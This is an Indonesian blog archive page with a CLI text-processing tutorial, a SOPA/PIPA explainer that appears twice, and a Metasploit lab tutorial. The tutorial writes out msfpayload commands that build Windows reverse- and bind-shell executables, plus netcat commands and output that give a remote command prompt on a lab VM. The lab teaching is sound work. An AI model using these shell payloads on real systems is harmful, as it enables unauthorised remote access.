Jumat, 27 Januari 2012

Do More With CLI [Part 1]

Linux memang identik dengan CLI (Command Line Interpreter), pengguna yang manja akan lebih menyukai menggunakan kursornya untuk melakukan setiap hal, bahkan hal yang mudah. Dan ini terjadi hampir terjadi pada setiap pengguna << back | track yang notabene adalah mantan pengguna windows. "The real hacker is not using GUI"!

Oke, pertanyaan yang sering keluar adalah: "Bagaimana cara melatih penggunaan CLI?" Anda bisa mempelajarinya dari hal terkecil. Yaitu perintah grep. Grep berfungsi untuk mencari string yang dikehendaki. Ini sama dengan perintah find text pada windows. Kali ini saya akan memberikan 3 Tutorial sekaligus, yaitu tutorial grep, tutorial awk, dan tutorial sed. Dan anda bisa mencobanya sendiri.

Preparation:
[*] Terminal terletak pada Applications - Accessories - Terminal

Goal:
[*] Menampilkan IP address pada terminal

Walkthrough:
1. Grep

Buka terminal, lalu masukan perintah

Command:
root@revolution:/# ifconfig wlan0

Kita akan menampilkan konfigurasi IP pada device wlan0 (WiFi Device)



Output:
root@revolution:/# ifconfig wlan0wlan0     Link encap:Ethernet  HWaddr 00:24:36:5c:ed:e3            inet addr:192.168.1.7  Bcast:192.168.1.255  Mask:255.255.255.0          inet6 addr: fe80::224:36ff:fe5c:ede3/64 Scope:Link          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1          RX packets:96332 errors:0 dropped:0 overruns:0 frame:0          TX packets:41418 errors:0 dropped:0 overruns:0 carrier:0          collisions:0 txqueuelen:1000           RX bytes:49392027 (49.3 MB)  TX bytes:7373200 (7.3 MB)

Kita telah mendapatkan konfigurasi IP dari wlan0. Langkah selanjutnya adalah menggunakan perintah grep. Masukan perintah:

Command:
root@revolution:/# ifconfig wlan0 | grep "inet addr:"

Perintah grep akan mencari string "inet addr:" pada output ifconfig wlan0.



Output:
root@revolution:/# ifconfig wlan0 | grep "inet addr:"          inet addr:192.168.1.7  Bcast:192.168.1.255  Mask:255.255.255.0

Ok. Sekarang output kita semakin berkurang, dari 7 baris, menjadi 1 baris saja. Lalu, bagaimana caranya agar output menghasilkan 192.168.1.7 ?


2. Awk

Langkah selanjutnya adalah menyingkirkan inet, Bcast, dan Mask. Kita akan menggunakan perintah awk. Perintah awk akan memilih text yang berada pada kolom tertentu. Dalam output di atas, kolom 1 bernilai : inet. Dipisahkan oleh spasi terdapat kolom 2, yaitu addr:192.168.1.7. Dipisahkan oleh spasi teradapat kolom 3, yaitu Bacst:192.168.1.255. Dan dipisahkan oleh spasi terdapat kolom terakhir, yaitu Mask:255.255.255.0. Kita akan memilih kolom ke dua, sehingga ouput kita akan menampilkan value dari kolom ke 2. Masukan perintah:

Command:
root@revolution:/# ifconfig wlan0 | grep "inet addr:" | awk '{print $2}'



awk '{print $2}' akan menampilkan nilai dari kolom ke dua, yaitu addr:192.168.1.7. Terlihat dari output kita di bawah:

Output:
root@revolution:/# ifconfig wlan0 | grep "inet addr:" | awk '{print $2}'addr:192.168.1.7

Ok, sekarang hasil kita semakin sedikit. Kali ini kita akan menyingkirkan addr: untuk mendapatkan output berupa IP address.


3. Sed

Langkah berikutnya adalah menyingkirkan string addr: dari output kita, sehingga kita mendapatkan output 192.168.1.7. Untuk menyingkirkan string tertentu, perintah sed adalah sed 's/[STRING YANG AKAN DIHAPUS]//' Masukan perintah berikut:

Command:
root@revolution:/# ifconfig wlan0 | grep "inet addr:" | awk '{print $2}'| sed 's/addr://'

Perintah di atas akan menghapus string addr:, maka output yang akan terlihat adalah.



Output:
root@revolution:/# ifconfig wlan0 | grep "inet addr:" | awk '{print $2}'| sed 's/addr://'192.168.1.7

Excellent!

Created by : red-dragon
Diposting oleh di Tidak ada komentar:
Label: , , , ,

Sabtu, 21 Januari 2012

Apa Itu SOPA dan PIPA

Apa Itu SOPA dan PIPA - Bagi sobat yang sering bergelut dengan dunia maya dan atau beraktivitas di internet itu sudah merupakan kebutuhan sehari-hari, sobat harus baca info penting ini dan kenali apa itu SOPA dan PIPA. Berikut penjelasan yang LM kutip dari kaskus.us.
SOPA (Stop Online Piracy Act) dan PIPA (Protect IP Act) adalah undang-undang yang diajukan tahun lalu oleh senator dan pejabat tinggi AS dengan tujuan untuk melindungi hak cipta materi internet seperti video, musik, software dan semua barang digital dari pembajakan. SOPA dan PIPA mengatur bagaimana dunia maya seharusnya menurut mereka, dan tentunya penggunanya. Namun, undang-undang ini tidak sesederhana itu, banyak hal dari undang-undang ini akan mengubah cara kerja internet saat ini.

  • Pemerintah AS dan organisasi perusahaan pemilik hak cipta dapat meminta penyedia layanan internet (ISP) untuk memblokir akses ke situs web yang dianggap sebagai penyedia tempat pelanggaran hak cipta. Teknisnya, yaitu memerintahkan ISP untuk mengubah server DNS mereka (baca: mem-block) dari membaca nama domain suatu situs di negara luar AS yang menyimpan konten ilegal seperti video, lagu, atau photo / gambar.
  • Pemerintah AS dan organisasi perusahaan pemilik hak cipta dapat mengambil tindakan hukum untuk menggugat mesin pencari, situs blog, direktori, atau situs secara umum yang memiliki situs-situs blacklist untuk dihapus dari situs web mereka. Teknisnya, yaitu memerintahkan situs pencari seperti Google atau lainnya untuk mengubah query pencariannya dengan mengecualikan situs yang menyimpan konten ilegal. Jadi, jika Anda mencari di situs pencari, situs ini tidak akan ditemukan. Prakteknya mirip dengan di Cina. Bila ada netter mengetik 'Tibet' atau 'Tianamen' di negeri tirai bambu itu dipastikan tak ditemukan hasil pencarian di Google. Begitu pula yang terjadi bila RUU disahkan di AS. Pengguna internet yang mengetik 'Iwan Yuliyanto download gratis' misal, bakal kecewa karena tiada hasil yang didapat, meskipun berkali - kali mencarinya.
  • Jaksa Agung AS dapat membawa kasus ke pengadilan yang akan memaksa mesin pencari, pengiklan, penyedia DNS, server, dan prosesor pembayaran dari memiliki kontak apapun dengan situs yang diduga melanggar. Teknisnya, yaitu memerintahkan layanan iklan seperti Google Adsense untuk menolak iklan atau pembayaran dari situs luar AS yang menyimpan konten ilegal. Prosesor pembayaran dapat memutuskan hubungan kerjasama dengan situs, bila mereka memberikan alasan kuat bahwa situs tersebut melanggar hak cipta. Teknisnya, yaitu memerintahkan layanan pembayaran online seperti Amazon, dsb untuk mematikan akun dari situs luar AS yang menyimpan konten ilegal.
  • RUU juga berpotensi memberi ancaman lebih dari itu karena definisi situs pembajak yang diusung SOPA dianggap terlalu luas. SOPA tak hanya mengancam situs-situs underground yang menyediakan lagu atau film gratis, namun juga situs yang dianggap dan dicurigai 'mempermudah atau memfasilitasi' materi bajakan bisa ikut disikat.
Contoh Kasus:
Saat seorang penonton konser merekam penampilan idolanya lewat ponsel lalu mengunggah ke situs YouTube tanpa izin distributor atau pemegang hak cipta, menurut RUU tersebut YouTube dianggap memfasilitasi pelanggaran hak cipta. Konsekuensinya YouTube harus di-block dan ditutup, dan pengunggah dipidanakan. Alhasil tak mustahil satu situs yang berisi puluhan ribu halaman bisa dimatikan hanya gara-gara satu halaman mengandung unsur pelanggaran hak cipta.

Dengan disahkannya SOPA dan PIPA, tentu saja akan membuat para raksasa sekelas Google, Yahoo, Facebook dan Mozilla berteriak. Bila Anda masih ingat, Mozilla sepanjang Desember lalu selalu menayangkan kalimat yang berbunyi "Kongres berusaha menyensor internet. Bantu Mozilla untuk memperjuangkan internet yang bebas dan terbuka. Bergabunglah sekarang!". Saat kalimat itu di-klik, pesan itu membawa ke tautan penjelasan apa itu SOPA dan PIPA.
Sedangkan dampaknya secara global adalah pengunjung dunia maya tidak akan lagi bisa melakukan kegiatan mengunduh dan semacamnya karena undang-undang tersebut menganggap ilegal.
Tentunya, banyak aspek dari Internet yang akan berubah, salah satu implementasi yang akan dilakukan oleh SOPA dan PIPA terhadap Internet adalah DNS Filtering dan DNSSEC yang diyakini oleh para ahli internet dan salah satunya, Mozilla, bahwa hal tersebut akan mengakibatkan masalah keamanan pada Internet dan juga melambatkan kinerja internet saat ini. Ada juga dampak-dampak lain yang akan terjadi pada internet, antara lain:
  • Banyak blog atau situs yang akan ditutup dikarenakan penggunaan misalnya logo, foto ataupun media lain yang diklaim oleh sang pemilik.
  • Situs-situs web service dan sosial media seperti Multiply, Facebook, YouTube, rapid*share, Twitter, Flickr, dll akan mengalami banyak masalah dan dituntut karena konten-konten yang dikontribusi oleh publik akan disaring dan disensor secara ketat.
  • Inovasi dan perkembangan teknologi dari Internet akan melambat karena perusahaan-perusahaan baru harus dapat memenuhi standar dari SOPA dan PIPA.
Tentu saja, dengan undang-undang tersebut, maka pemerintah AS berhak menuntut situs untuk menghapus konten-konten yang menurut mereka ilegal atau situs tersebut akan diblok (melalui ISP setempat), sehingga pengguna tidak bisa membuka lagi situs kesayangannya. Secara garis besar, SOPA dan PIPA jika disetujui hanya akan berlaku di AS dan tidak di negara lain. TETAPI, jika ada yang menggunakan server-server di Amerika Serikat untuk hosting website, tentunya konten-konten website tersebut akan masuk ke dalam juridiksi hukum di sana. Memang secara langsung, SOPA dan PIPA ini tidak mempengaruhi jaringan internet di Indonesia. Namun, bisa dibayangkan untuk kita yang sehari-hari menggunakan service-service sosial media seperti Multiply, Facebook, Google, Twitter, YouTube, dan lain-lain; kebanyakan website-website ini akan menjadi target sasaran dari SOPA dan PIPA. Penggunaan internet bisa dipastikan akan berubah jika SOPA dan PIPA diluluskan.
Sederhananya, karena memang nyatanya di internet banyak situs (di luar AS) yang menyimpan konten-konten, parlemen AS mencari cara agar bisa melarang keberadaan situs semacam itu dan mengekang apa yang disebut kebebasan internet, karena sebenarnya SOPA dan PIPA bisa berdampak lebih luas dari sekedar pelarangan konten-konten. Teknisnya, apabila situs tersebut di luar Amerika, maka penyedia jasa layanan internet (ISP) diwajibkan memblokir akses ke situs tersebut.
Pada Desember 2011 lalu, koalisi anti-SOPA memasang iklan satu halaman penuh di hampir semua media massa nasional. Tak tanggung-tanggung, Google bahkan menyewa 15 firma pelobi untuk menghadang paket RUU itu agar tidak sampai disahkan. Namun, musuh yang dihadapi anti-SOPA itu tidak enteng, mereka lawan sekaliber. Maklum industri musik, film dan kamar dagang Amerika berada dibalik RUU tersebut. Salah satunya Asosiasi Distributor Film Amerika (MPPAA) organisasi yang membawahi nama beken seperti Universal Pictures, Sony, Warner Bros dan 20th Century Fox. MPPA selama ini dikenal getol menarget situs luar agar tak bisa diakses warga AS dan dipandang sebagai pihak selalu kalah bila berhadapan pembajak asing.
Hampir semua media massa mengecam dan mengkritik RUU itu dalam editorialnya, seperti TechDirt. Tak ketinggalan situs-situs teknologi juga ikut menyuarakan tentangan keras. Gerakan anti-SOPA memang kuat, tapi mereka di luar Kongres. Sedangkan dalam Kongres dukungan terhadap paket yang terdiri dari dua RUU itu juga sangat serius. Pertempuran dua kubu pro dan anti RUU bisa jadi dimenangkan kubu yang pro (karena didukung pemodal raksasa).
Meskipun kondisi terburuk sudah Anda baca pada poin 5 di atas, Tetaplah Optimis dan Semangat, kawan. Bila Anda masih menginginkan kebebasan , Anda PATUT mendukung sebuah PETISI yang telah dibuat.
Silakan SAAT INI juga menyumbangkan suaranya melalui link-link berikut:
Caranya: isi email dibawah tulisan “NOT IN THE US? PETITION THE STATE DEPARTMENT” lalu tekan tombol SIGN THE PETITION.
... atau ...
Caranya: isi email, nama, serta kode pos pada kolom sisi kanan, lalu tekan tombol SEND.

Mulai dari diri sendiri gan,
hilangkan pikiran "ah, cuma gw ini, mana pengaruh sama keputusan amrik".
ingat, pengguna internet ngga cuma di amrik, tapi di dunia.
dan INDONESIA menduduki peringkat ke-4 dalam daftar pengguna internet DUNIA.
ayo gan, kita pasti bisa. ingat sebelum 24 JANUARI 2012
Sumber:
http://ikanmasteri.com/archives/3567
http://fightforfreedom.multiply.com/journal/item/75?
http://wordpress.org/news/2012/01/help-stop-sopa-pipa/
4.5

Bagaimana menurut kamu mengenai Apa Itu SOPA dan PIPA dengan Rating 4.5 ini, beri komentarnya ya kalau menarik dan bagikan ke Google Plus, Twitter dan Facebook kamu. Trims...!!!
Diposting oleh di Tidak ada komentar:

Apa Itu SOPA dan PIPA

Apa Itu SOPA dan PIPA - Bagi sobat yang sering bergelut dengan dunia maya dan atau beraktivitas di internet itu sudah merupakan kebutuhan sehari-hari, sobat harus baca info penting ini dan kenali apa itu SOPA dan PIPA. Berikut penjelasan yang LM kutip dari kaskus.us.
SOPA (Stop Online Piracy Act) dan PIPA (Protect IP Act) adalah undang-undang yang diajukan tahun lalu oleh senator dan pejabat tinggi AS dengan tujuan untuk melindungi hak cipta materi internet seperti video, musik, software dan semua barang digital dari pembajakan. SOPA dan PIPA mengatur bagaimana dunia maya seharusnya menurut mereka, dan tentunya penggunanya. Namun, undang-undang ini tidak sesederhana itu, banyak hal dari undang-undang ini akan mengubah cara kerja internet saat ini.

  • Pemerintah AS dan organisasi perusahaan pemilik hak cipta dapat meminta penyedia layanan internet (ISP) untuk memblokir akses ke situs web yang dianggap sebagai penyedia tempat pelanggaran hak cipta. Teknisnya, yaitu memerintahkan ISP untuk mengubah server DNS mereka (baca: mem-block) dari membaca nama domain suatu situs di negara luar AS yang menyimpan konten ilegal seperti video, lagu, atau photo / gambar.
  • Pemerintah AS dan organisasi perusahaan pemilik hak cipta dapat mengambil tindakan hukum untuk menggugat mesin pencari, situs blog, direktori, atau situs secara umum yang memiliki situs-situs blacklist untuk dihapus dari situs web mereka. Teknisnya, yaitu memerintahkan situs pencari seperti Google atau lainnya untuk mengubah query pencariannya dengan mengecualikan situs yang menyimpan konten ilegal. Jadi, jika Anda mencari di situs pencari, situs ini tidak akan ditemukan. Prakteknya mirip dengan di Cina. Bila ada netter mengetik 'Tibet' atau 'Tianamen' di negeri tirai bambu itu dipastikan tak ditemukan hasil pencarian di Google. Begitu pula yang terjadi bila RUU disahkan di AS. Pengguna internet yang mengetik 'Iwan Yuliyanto download gratis' misal, bakal kecewa karena tiada hasil yang didapat, meskipun berkali - kali mencarinya.
  • Jaksa Agung AS dapat membawa kasus ke pengadilan yang akan memaksa mesin pencari, pengiklan, penyedia DNS, server, dan prosesor pembayaran dari memiliki kontak apapun dengan situs yang diduga melanggar. Teknisnya, yaitu memerintahkan layanan iklan seperti Google Adsense untuk menolak iklan atau pembayaran dari situs luar AS yang menyimpan konten ilegal. Prosesor pembayaran dapat memutuskan hubungan kerjasama dengan situs, bila mereka memberikan alasan kuat bahwa situs tersebut melanggar hak cipta. Teknisnya, yaitu memerintahkan layanan pembayaran online seperti Amazon, dsb untuk mematikan akun dari situs luar AS yang menyimpan konten ilegal.
  • RUU juga berpotensi memberi ancaman lebih dari itu karena definisi situs pembajak yang diusung SOPA dianggap terlalu luas. SOPA tak hanya mengancam situs-situs underground yang menyediakan lagu atau film gratis, namun juga situs yang dianggap dan dicurigai 'mempermudah atau memfasilitasi' materi bajakan bisa ikut disikat.
Contoh Kasus:
Saat seorang penonton konser merekam penampilan idolanya lewat ponsel lalu mengunggah ke situs YouTube tanpa izin distributor atau pemegang hak cipta, menurut RUU tersebut YouTube dianggap memfasilitasi pelanggaran hak cipta. Konsekuensinya YouTube harus di-block dan ditutup, dan pengunggah dipidanakan. Alhasil tak mustahil satu situs yang berisi puluhan ribu halaman bisa dimatikan hanya gara-gara satu halaman mengandung unsur pelanggaran hak cipta.

Dengan disahkannya SOPA dan PIPA, tentu saja akan membuat para raksasa sekelas Google, Yahoo, Facebook dan Mozilla berteriak. Bila Anda masih ingat, Mozilla sepanjang Desember lalu selalu menayangkan kalimat yang berbunyi "Kongres berusaha menyensor internet. Bantu Mozilla untuk memperjuangkan internet yang bebas dan terbuka. Bergabunglah sekarang!". Saat kalimat itu di-klik, pesan itu membawa ke tautan penjelasan apa itu SOPA dan PIPA.
Sedangkan dampaknya secara global adalah pengunjung dunia maya tidak akan lagi bisa melakukan kegiatan mengunduh dan semacamnya karena undang-undang tersebut menganggap ilegal.
Tentunya, banyak aspek dari Internet yang akan berubah, salah satu implementasi yang akan dilakukan oleh SOPA dan PIPA terhadap Internet adalah DNS Filtering dan DNSSEC yang diyakini oleh para ahli internet dan salah satunya, Mozilla, bahwa hal tersebut akan mengakibatkan masalah keamanan pada Internet dan juga melambatkan kinerja internet saat ini. Ada juga dampak-dampak lain yang akan terjadi pada internet, antara lain:
  • Banyak blog atau situs yang akan ditutup dikarenakan penggunaan misalnya logo, foto ataupun media lain yang diklaim oleh sang pemilik.
  • Situs-situs web service dan sosial media seperti Multiply, Facebook, YouTube, rapid*share, Twitter, Flickr, dll akan mengalami banyak masalah dan dituntut karena konten-konten yang dikontribusi oleh publik akan disaring dan disensor secara ketat.
  • Inovasi dan perkembangan teknologi dari Internet akan melambat karena perusahaan-perusahaan baru harus dapat memenuhi standar dari SOPA dan PIPA.
Tentu saja, dengan undang-undang tersebut, maka pemerintah AS berhak menuntut situs untuk menghapus konten-konten yang menurut mereka ilegal atau situs tersebut akan diblok (melalui ISP setempat), sehingga pengguna tidak bisa membuka lagi situs kesayangannya. Secara garis besar, SOPA dan PIPA jika disetujui hanya akan berlaku di AS dan tidak di negara lain. TETAPI, jika ada yang menggunakan server-server di Amerika Serikat untuk hosting website, tentunya konten-konten website tersebut akan masuk ke dalam juridiksi hukum di sana. Memang secara langsung, SOPA dan PIPA ini tidak mempengaruhi jaringan internet di Indonesia. Namun, bisa dibayangkan untuk kita yang sehari-hari menggunakan service-service sosial media seperti Multiply, Facebook, Google, Twitter, YouTube, dan lain-lain; kebanyakan website-website ini akan menjadi target sasaran dari SOPA dan PIPA. Penggunaan internet bisa dipastikan akan berubah jika SOPA dan PIPA diluluskan.
Sederhananya, karena memang nyatanya di internet banyak situs (di luar AS) yang menyimpan konten-konten, parlemen AS mencari cara agar bisa melarang keberadaan situs semacam itu dan mengekang apa yang disebut kebebasan internet, karena sebenarnya SOPA dan PIPA bisa berdampak lebih luas dari sekedar pelarangan konten-konten. Teknisnya, apabila situs tersebut di luar Amerika, maka penyedia jasa layanan internet (ISP) diwajibkan memblokir akses ke situs tersebut.
Pada Desember 2011 lalu, koalisi anti-SOPA memasang iklan satu halaman penuh di hampir semua media massa nasional. Tak tanggung-tanggung, Google bahkan menyewa 15 firma pelobi untuk menghadang paket RUU itu agar tidak sampai disahkan. Namun, musuh yang dihadapi anti-SOPA itu tidak enteng, mereka lawan sekaliber. Maklum industri musik, film dan kamar dagang Amerika berada dibalik RUU tersebut. Salah satunya Asosiasi Distributor Film Amerika (MPPAA) organisasi yang membawahi nama beken seperti Universal Pictures, Sony, Warner Bros dan 20th Century Fox. MPPA selama ini dikenal getol menarget situs luar agar tak bisa diakses warga AS dan dipandang sebagai pihak selalu kalah bila berhadapan pembajak asing.
Hampir semua media massa mengecam dan mengkritik RUU itu dalam editorialnya, seperti TechDirt. Tak ketinggalan situs-situs teknologi juga ikut menyuarakan tentangan keras. Gerakan anti-SOPA memang kuat, tapi mereka di luar Kongres. Sedangkan dalam Kongres dukungan terhadap paket yang terdiri dari dua RUU itu juga sangat serius. Pertempuran dua kubu pro dan anti RUU bisa jadi dimenangkan kubu yang pro (karena didukung pemodal raksasa).
Meskipun kondisi terburuk sudah Anda baca pada poin 5 di atas, Tetaplah Optimis dan Semangat, kawan. Bila Anda masih menginginkan kebebasan , Anda PATUT mendukung sebuah PETISI yang telah dibuat.
Silakan SAAT INI juga menyumbangkan suaranya melalui link-link berikut:
Caranya: isi email dibawah tulisan “NOT IN THE US? PETITION THE STATE DEPARTMENT” lalu tekan tombol SIGN THE PETITION.
... atau ...
Caranya: isi email, nama, serta kode pos pada kolom sisi kanan, lalu tekan tombol SEND.

Mulai dari diri sendiri gan,
hilangkan pikiran "ah, cuma gw ini, mana pengaruh sama keputusan amrik".
ingat, pengguna internet ngga cuma di amrik, tapi di dunia.
dan INDONESIA menduduki peringkat ke-4 dalam daftar pengguna internet DUNIA.
ayo gan, kita pasti bisa. ingat sebelum 24 JANUARI 2012
Sumber:
http://ikanmasteri.com/archives/3567
http://fightforfreedom.multiply.com/journal/item/75?
http://wordpress.org/news/2012/01/help-stop-sopa-pipa/
4.5

Bagaimana menurut kamu mengenai Apa Itu SOPA dan PIPA dengan Rating 4.5 ini, beri komentarnya ya kalau menarik dan bagikan ke Google Plus, Twitter dan Facebook kamu. Trims...!!!
Diposting oleh di Tidak ada komentar:

Rabu, 18 Januari 2012

Perbedaan Reverse TCP dan Bind TCP

Pengguna metasploit untuk tingkat pemula, mungkin pernah bertanya-tanya. Apa perbedaan payload reverse_tcp dengan payload bind_tcp? Sederhananya, reverse adalah perintah dari attacker kepada korban, untuk menghubungi korban. Sementara bind tcp adalah perintah dari attacker kepada korban, untuk membuka akses kepada attacker. Ilustrasinya seperti ini

[reverse_tcp]
attacker -> [hubungi saya di port 4444] -> victim

setelah payload dieksekusi
attacker <-> [port 4444] <-> victim

[bind_tcp]
attacker -> [buka jalan untuk saya di port 4444] -> victim

setelah dieksekusi
attacker <-> [port 4444] <-> victim

Untuk membuktikannya, saya akan mengadakan percobaan mengenai payload. Anda bisa mencoba sendiri di rumah.

Tools requirements:
[*] msfpayload dapat ditemukan di backtrack 5
[*] netcat dapat ditemukan di backtrack 5
[*] vmware player
[*] windows XP SP 2

System requirements:
[*] VMware menggunakan koneksi NAT
[*] IP address attacker vmnet8 10.10.10.1
[*] IP address victim vmnet8 10.10.10.128
[*] Windows XP di dalam vmware telah terinstall vmware tools

Walk-through:
1. Buat PAYLOAD windows/shell_reverse_tcp

Buka terminal, kemudian masukan perintah:

Command:
root@revolution:~# msfpayload windows/shell_reverse_tcp LHOST=10.10.10.1 LPORT=4444 X > /tmp/reverse.exe



Keterangan:
[*] saya akan membuat payload windows/shell_reverse_tcp
[*] ip address saya 10.10.10.1
[*] port listener saya tentukan di 4444
[*] payload ini saya simpan di folder /tmp dengan nama reverse.exe

Buka folder /tmp, kemudian copy file reverse.exe, kemudian paste di windows XP. Kembali ke terminal, kemudian masukan perintah:

Command:
root@revolution:~# nc -l -v -p 4444

Keterangan:
[*] saya menggunakan netcat sebagai handler terhadap koneksi yang masuk
[*] menentukan netcat sebagai listener (-l)
[*] menentukan netcat untuk mengaktifkan verbose mode (-v)
[*] menentukan netcat untuk melakukan listening pada port 4444 (-p 4444)

Kemudian jalankan file reverse.exe yang ada di windows xp.

Maka ini yang akan terjadi:
Command:
root@revolution:~# nc -l -v -p 4444listening on [any] 4444 ...10.10.10.128: inverse host lookup failed: Unknown server error : Connection timed outconnect to [10.10.10.1] from (UNKNOWN) [10.10.10.128] 1062Microsoft Windows XP [Version 5.1.2600](C) Copyright 1985-2001 Microsoft Corp.
C:\Documents and Settings\User\Desktop>



FAQ [Frequently Asked Questions]
[Q] Apa fungsi payload yang kita buat?
[A] Payload yang kita buat, memiliki perintah dari attacker kepada victim untuk menghubungi attacker di port 4444

[Q] Mengapa kita mendapatkan command prompt milik victim?
[A] Itu karena payload yang kita buat adalah shell_reverse_tcp, ini berfungsi agar netcat mengeksekusi shell aka command prompt (pada windows) setelah konesi di port 4444 terjadi

[Q] Bisakah saya menentukan di port yang berbeda selain 4444?
[A] Bisa, dengan syarat port tersebut sedang tidak digunakan oleh proses lain, misalkan port 80 yang biasa digunakan oleh Apache, atau 22 yang biasa digunakan oleh OpenBSD untuk SSH connection.


2. Buat payload windows/shell_bind_tcp

Buka terminal, kemudian masukan perintah:

Command:
root@revolution:~# msfpayload windows/shell_bind_tcp LPORT=4444 X > /tmp/bind.exe



Keterangan:
[*] Saya akan membuat payload windows/shell_bind_tcp
[*] Saya menentukan 4444 sebagai port listener agar attacker dapat masuk ke system milik victim
[*] Saya menyimpan payload di folder /tmp dengan nama bind.exe

Buka folder /tmp, kemudian copy bind.exe ke Windows XP. Jangan jalankan file ini terlebih dahulu!

Buka command prompt windows, kemudian ketik

Command:
C:\Documents and Settings\User> netstat -an | find "4444"



Keterangan:
[*] netstat adalah perintah command prompt untuk mengecek koneksi yang terjadi dalam sebuah system
[*] saya akan mengecek, apakah port 4444 terbuka

Terlihat bahwa port 4444 tidak terbuka. Setelah itu, jalankan file bind.exe. Kemudian masukan perintah netstat kembali pada command prompt:

Command:
C:\Documents and Settings\User> netstat -an | find "4444"



Terlihat bahwa sekarang muncul port 4444 yang melakukan listening terhadap koneksi. Kali ini kita akan menggunakan netcat untuk mendapatkan command prompt milik victim.

Command:
root@revolution:~# nc -v 10.10.10.128 4444

Maka ini yang akan terjadi:

Command:
root@revolution:~# nc -v 10.10.10.128 444410.10.10.128: inverse host lookup failed: Unknown server error : Connection timed out(UNKNOWN) [10.10.10.128] 4444 (?) openMicrosoft Windows XP [Version 5.1.2600](C) Copyright 1985-2001 Microsoft Corp.
C:\Documents and Settings\User\Desktop>



Keterangan:
[*] Kali ini saya akan menghubungi IP address victim [10.10.10.128]
[*] Saya akan mencoba port 4444 untuk akses masuk

FAQ [Frequently Asked Question]
[Q] Apa yang terjadi?
[A] Payload kita telah membuat victim membuka port 4444 agar attacker dapat masuk ke system korban

Created by: red-dragon
Diposting oleh di Tidak ada komentar:
Label: , , ,
Langganan: Komentar (Atom)